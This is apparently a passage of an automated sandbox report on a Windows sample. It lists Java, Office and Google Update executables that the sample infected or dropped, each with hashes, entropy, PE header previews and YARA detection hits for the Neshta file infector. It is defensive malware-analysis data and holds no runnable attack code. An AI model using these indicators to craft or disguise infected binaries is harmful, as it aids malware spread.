                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe, Author: Joe Security
                                                          C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.653521772684421
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJC/rmKEs2WzzIR++tGuPkNoAvBFbq6DAcBDjFsb:sr85C/qLWos+tGEkBbq6D3Bdsb
                                                          MD5:50B7F8BD51D8BEA4542C8B6FB7046568
                                                          SHA1:46FE9571A136EEDD3DC35089F096D47B32EA74C8
                                                          SHA-256:86A782FF58F3B5F1736EF23051833E340FD56A77C1EDDDBA8ECC5A507BA47EE0
                                                          SHA-512:87A46E55F78299DA53343B832D84C81C230D46AEFB71C603998DA5F6D0BB3FFE6FDA5F825F5731F7B810E21C1EF8E9812278D07E7402BB3913AF6DD66DD43CE1
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe, Author: Joe Security
                                                          C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.656070779362061
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJC/rmKKKajo+iKndnTdkCE1A6n82c6jbs2:sr85C/qo0o+iwdnP6ngIs2
                                                          MD5:60628C314BCF2A97CCFA9CB4241A2DAB
                                                          SHA1:6EF748A1568A9AE0D541C5CDF0F74430A59E4DE5
                                                          SHA-256:FD8BD222DB055C39D6050A10F91EEE576ADDFC37CE78F585ACC48F96E222FA90
                                                          SHA-512:2AC9ED50008A13A4255ABB338C675D53688D321E6086B6DF17B02A3F89896051F60E8565001CE0B7BCEBD0CD211DED9B9574347BC95A05922700C20806EC93EC
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exe, Author: Joe Security
                                                          C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.6397427450636055
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJC/rmKHLgwHz2xi03XxQy012eqZwE:sr85C/qMsc2Y03BQz2eqZP
                                                          MD5:7132D6785E73B1159F3AC9AC5DE71A1C
                                                          SHA1:0EF8C262E63E3776662064D00E5C4264D0213C8B
                                                          SHA-256:629945249C52DDB4108FF5C239D4E2C79C92A545ECD25DAE395697831D648A5F
                                                          SHA-512:804BD2E14C52D226F1D470D0C73B3DE7945EA24EA4554D916FF796E24F6C7C6B5A21284396C6359CBD94ACCE87517D19984F207FEED537AE9DDE8C29D04D2A9E
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exe, Author: Joe Security
                                                          C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXE
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.529062771218018
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCPQ5vyh0tYhgw2azkO8rn85GF:sr85CPQ5vyhvcOQn2GF
                                                          MD5:2FECE9074EC51CAA91DDEA7FBB4FFC54
                                                          SHA1:35BD848191A5C14897883B9A11BECC6DB522A88F
                                                          SHA-256:B4D954F33DDFC952FDD208E3EFFCD6A1E442DE8D07C9148C4771986F781C294F
                                                          SHA-512:F9C3249A39CB4206E495EED2A5C6130CCB04874FBFCB9D0D3D854B6625791E88C2BF29A7AE6C5E57B2B5C4EF25F39AA7BAA4B8C989A3A62D9FCFAF9116417AEB
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXE, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXE, Author: Joe Security
                                                          C:\Program Files (x86)\Common Files\microsoft shared\DW\DWTRIG20.EXE
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.4112170834310565
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCUN8aliPc8ZbyHVftptXvVWi6N8rKca:sr85CU6i/XtXv7+8rKca
                                                          MD5:BA5A5D15C15E1143A35B5ACB9DA43F23
                                                          SHA1:BE948D6A40AE1221B2E093B6634D695EEDFAD323
                                                          SHA-256:075242C15AEF5CC590E716651ED3F1F53A8BD23A37CFA60F827DBE60B7DA8918
                                                          SHA-512:3E36FA618DF02872C1F5043318A8F945912FC5162F8C9ECE7FDA323F7D8AFD53157C00519E50DA9899DA6BF3117CA82011757B987726F968C3B7B5A632066EDA
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\DW\DWTRIG20.EXE, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\microsoft shared\DW\DWTRIG20.EXE, Author: Joe Security
                                                          C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CMigrate.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.374994892226591
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCrNsxigdJqueeYUOc1wxNXI:sr85CCnneeVV1
                                                          MD5:BED5A0265D4F2739606BD0C79DB41BDB
                                                          SHA1:0EAE9CA564CC3B83B4B7CAAF64FED47567C8A6D1
                                                          SHA-256:713E2E20A467272CF5E174DFF81954001170C7F92143A5F34C2FFAE9B85BDC04
                                                          SHA-512:FAD8C0A7ED8FBCC7BC9704522B2A35C2BCEA68DE3A614009D49DE7F8C8B35F06DA12E5DA78EF8E96FF72983C33268046521C190C0BD0F8A644887A65DA44B2B8
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CMigrate.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CMigrate.exe, Author: Joe Security
                                                          C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CSISYNCCLIENT.EXE
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.305732261424221
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCWdVJe84MtsqXZhbkALEwcyj3Y:sr85CKVYpqeyDY
                                                          MD5:3A6E83146F925E67FD9BD350F823858C
                                                          SHA1:030EF0512034AE6FFA06C7B42041252A56613799
                                                          SHA-256:494DC48B1892964FB6D5CBB19DACBE990434EED9DEE1BD64D9E74D14681717F3
                                                          SHA-512:F06ABB303461C6F016470C343DBDACB154C2575095B67B0A2620DBF6E7F799BEC18A6F5E3C678DB107F98764701DE33C75C1E6FC08ADD22FF6D486164DC17336
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CSISYNCCLIENT.EXE, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CSISYNCCLIENT.EXE, Author: Joe Security
                                                          C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\FLTLDR.EXE
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.375840229458048
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCUK78LyRHC/T5ICzzKgHiTs33fSQ19uk:sr85CUdGS2gHN3aQ1p
                                                          MD5:8D7C662937FFE3C3AA129DD3BA7B887F
                                                          SHA1:F67F3B5C32BF6CC3DEA744DAAB16177DD86DBFF6
                                                          SHA-256:656ED573131580248ACC968FABBA2197657EAEE8DD6D0BA533A50DD34E74B603
                                                          SHA-512:71235707D208BEA37FA95A5BD5EF10F768740621008A50B3E440C70B86039AC2428E8B7105A93921DD8DF659AD35C36BB4BFA2C922335680CC1660B48FD54B4A
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\FLTLDR.EXE, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\FLTLDR.EXE, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\LICLUA.EXE
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.461871956296466
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCqi4IvHjjWhQmgBhtV+mLtiqdSo:sr85CqThgpLTso
                                                          MD5:CE04DA14A0724F9E950D41F9B2CC1643
                                                          SHA1:EFF607BAD3A4CB05CC38065E45DC61555618A060
                                                          SHA-256:D90265A2653E732290DD6617ADD54CA1B2981481AE6B6C18C570D4552C84E826
                                                          SHA-512:6E548630AF301C8F472BACCB487C31E7E4092E3B25F439D585F36F0A24846C6C0F4A3AF34BE25389D9B9FDF6C1A03A9A8106F9FD777BFB4D1F824A29844E5803
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\LICLUA.EXE, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\LICLUA.EXE, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXE
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):5.119504084682648
                                                          Encrypted:false
                                                          SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJxqs0y0gqotvngnYkJZZZZZZZZZZZZZz:JxqjQ+P04wsmJC2L4Y4YkvJt
                                                          MD5:EF92B40044CB210120E9889CA1DC1D5C
                                                          SHA1:EEDCB5BA7F70F04C3D25AD321C93F978E5E1C7A8
                                                          SHA-256:016D35F82750ECF792D64A6CFF5D376DB69F2BA1D30BEF80978CCBE84ACFFD0B
                                                          SHA-512:DBB2EC69392CFFA9ABC8EB0E2C979E5CD4F6A806E14D53F87E8D041E7F0D25816D13363FA66F97FB93DABA8E5CBB17D617029A87BBB31CDECE9A48745E321062
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXE, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXE, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOSQM.EXE
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):4.799951544005101
                                                          Encrypted:false
                                                          SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJbR+QDxQPcfwBOB6ZZZZZZZZZZZZZbJO:JxqjQ+P04wsmJCC+WxQ0lEJRaCA
                                                          MD5:7078371E0D358B86D46D6CF87987C8CD
                                                          SHA1:6F58E6F33BB9242034F7C6CDCF17B637C060C8BA
                                                          SHA-256:2DE937273CBFE6AA5909EFD083FFE477DC7CF37739F12923E2B2FB1B1B6E17B1
                                                          SHA-512:13449BFDB7AABDC75EC51F1FCB5FE95761C22E3F9E4D1A1CBB5BFC0A3F8FE2AB2FDC3ACD0BAA0D5BADDF0CD0DB390788C60B9C664C3E3FDCC29537347B83E4EF
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOSQM.EXE, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOSQM.EXE, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOXMLED.EXE
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.05148718063145
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCPkMrdYJnRQV6J4tuw62roH5lL1u:sr85C9rsRQIouwjQlL
                                                          MD5:D4B144B9963B3114F1D938F44200AE62
                                                          SHA1:F14C2F8BD9BD0CAC7A682D453C58B99858D6C0CE
                                                          SHA-256:CB49C8EA020EABA89BB5032060928901AA90BA2530CD5D5467D15AAB489747DA
                                                          SHA-512:80D70AAF806C46388447A4BF0DF9A98C7DBC211E290A60F3A30C560E09BF12BBDCDABB4DA0B945A8144CBE8D2B22CD4F0D9AFF4DBC33E8FBCB7DAA8244CEDA95
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOXMLED.EXE, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOXMLED.EXE, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.365915780903398
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJC+rie7lHfYdCtBzNKxmtshDucWs/7VOb88sirz:sr85C+rN7btBAxm2Z/ps/rz
                                                          MD5:43B8EBCCF6312172AF0638D6EA2E9A4B
                                                          SHA1:C628EBF5D72FDA6B9BE07CB69312472906E1143B
                                                          SHA-256:B42F96D408CFDB35545C5900EC0E8AE72B85FC960DC4BDBDEFD0B6A4BF3A49C3
                                                          SHA-512:773A5C800CA9EE738A6152D0B9B6F1CFC410407F95CA84D72951C4D8BFE914659FD66892A927174278BA77B5190BF74B98B806E6A78AAAE2D70277345AEAFC4C
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Oarpmany.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.420838658743323
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCVNAa6ZUmWtWHpy7+OAqbrefMSy8A:sr85CVNB6zLy79b8A
                                                          MD5:58473BD19292BBBB9CE1C6BFAE872648
                                                          SHA1:D9B5084A65CF3C039D51AE4F1C39C7E5DD83DBCC
                                                          SHA-256:328E9B6CE1A7D1B4B8B602F1A2D61C56BF85CEC9293C55C047584937C9390C3D
                                                          SHA-512:E0A19F3C91BC3433D5AD83C78135346769889BA06EB56F92AE3137CB7769582BA5F6139524EEFFE238B67CDA3BCC8854F2E59283E60D23BD555DEB6152310872
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Oarpmany.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Oarpmany.exe, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\ODeploy.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.364257425575085
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCRtWit2d+BkpzTscsot7h:sr85CRtWo2Q+ycsAh
                                                          MD5:9180D3CEE013A6DE40DD963A16951734
                                                          SHA1:18E74AD691F4448AA451FBE5AB7D374F24CB07B4
                                                          SHA-256:299E81E2FE407A151C56B24E904AA2B0B9C18F712A0B43E704034939AAD1B564
                                                          SHA-512:DBDE2F6EED630ADADC7F58FFA269DCFE2749F499B8C5DE0927DE47EFF55FB7B6A185B1323DA55307228D117629B79152638B129D92562ACCA208555E7105F9EF
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\ODeploy.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\ODeploy.exe, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\Setup.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.435519044418047
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCxKZg7inyp+gsnV3SNjDBII0DNC:sr85Cx4g7Ky1p7
                                                          MD5:E7868326F5EF4E85A0FBAEC678D13A2C
                                                          SHA1:7E57578EA08482DA52474EEB3960CD4407225A59
                                                          SHA-256:D702CB2F33424FDBCE4EF3CB5B2C0DA789758F4EA6A4AB772591F110369F90F4
                                                          SHA-512:F56B049C81F2433875840455C18FF972C848C4AE0F04CCFD5BBE5C2222A26680AF3B86A301F9886A84C8D4EAC8861786AAEE224278E96F85B999BF4DA7E3306D
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\Setup.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\Setup.exe, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Common Files\microsoft shared\Source Engine\OSE.EXE
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.278417014765199
                                                          Encrypted:false
                                                          SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJBr+YKB8MXTVul6YekIfQzbL2Vo8/nXS:JxqjQ+P04wsmJCUyYKBRXM6PaGxZCP
                                                          MD5:4C6732F9F7CF89C1BC807F26552F0592
                                                          SHA1:9790303D2B8FD2C4DEC80D34C7E7D61081DDB03B
                                                          SHA-256:16A32ABF53E0246C49D984F31FA56B612A818BFA4FFF7681196DEC4F6343F19F
                                                          SHA-512:56D5EDE482CFE2DEFEE022CEB66EF839E9B47F33D8A270E060A729D70FF03F74A8C1699492C8C2BFB88B70483153C79A5890B31FEB3C7B3BCDB0AFC9D4FE59A7
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\Source Engine\OSE.EXE, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\microsoft shared\Source Engine\OSE.EXE, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.254081989191424
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCbblZ1PNq9uCUOFVSiHdq+sxneZ:sr85Cbbr1Pg9uCRFRzsxeZ
                                                          MD5:C2C98501C8C0A38CB3B3D89B1CD09C67
                                                          SHA1:8D8469485BD3995DE34512BAC18DA482A31B5DC2
                                                          SHA-256:EFB24F3670542E6B491E3B9092E31E5068EDC2068C986F4D96E9F8176F6DCF26
                                                          SHA-512:10A42C069528EE8D55BE2106F2851B9E26AFEA5311D63D1CEDE860DB6B8E0252C3875422B047A9C6D35FC3D3F8409771A682B67C85CACF0A8D8A9352491FC3E0
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exe
Process: C:\Users\user\Desktop\Z68mMCAxFZ.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 82944
Entropy (8bit): 6.565853286242963
Encrypted: false
SSDEEP: 768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJPwnvIu/+HCidGL0RYfqJfj+0xUYfQ76:JxqjQ+P04wsmJC6cQZo0xUFGh1SNcs8
MD5: 2BE98153912196C9044AB31250DEAF28
SHA1: 18487088B298B9E6B5E7FBDD00D5C37F2ED6AA78
SHA-256: 47164473C9E34EC71472CB3516C4575D1C8A4484BE1308DD69AAD38CB84D03AD
SHA-512: 20DB7DFC73249CE140DC3764D8A304A0CE080E9421751CA394829D0A57962D19A86C2A799CD0650DE14CD0CCF56BE887B63E696A9FB0F2D12994DDAB410CB662
Malicious: true
Yara Hits:
• Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exe, Author: Florian Roth
• Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exe, Author: Joe Security

C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exe
